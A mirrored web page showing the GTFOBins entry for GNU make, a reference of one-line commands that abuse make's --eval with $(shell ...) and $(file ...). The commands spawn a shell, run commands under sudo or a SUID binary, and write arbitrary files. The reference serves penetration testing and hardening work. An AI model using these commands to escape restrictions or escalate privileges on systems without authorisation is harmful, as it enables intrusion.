This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-09 00:41:33 +01:00
Code
Issues
5fa7efbc1c
GTFOBins.github.io
/
_gtfobins
/
make.md
Dov Murik
5fa7efbc1c
Add base64, ltrace, make, sqlite3, time
2018-06-04 10:21:53 +00:00
689 B
Raw
Blame
History
functions
execute-interactive
execute-non-interactive
sudo-enabled
suid-enabled
file-write
code
COMMAND='/bin/sh 1>&2' make -s --eval="a := $(info $(shell $COMMAND))" --eval='all:'
code
COMMAND=/usr/bin/id make -s --eval="a := $(info $(shell $COMMAND))" --eval='all:'
code
COMMAND=/usr/bin/id sudo make -s --eval="a := $(info $(shell $COMMAND))" --eval='all:'
code
COMMAND=/usr/bin/id ./make -s --eval="a := $(info $(shell $COMMAND))" --eval='all:'
code
LFILE=file_to_write make -s --eval="a := $(file >$LFILE,data)" --eval='all:'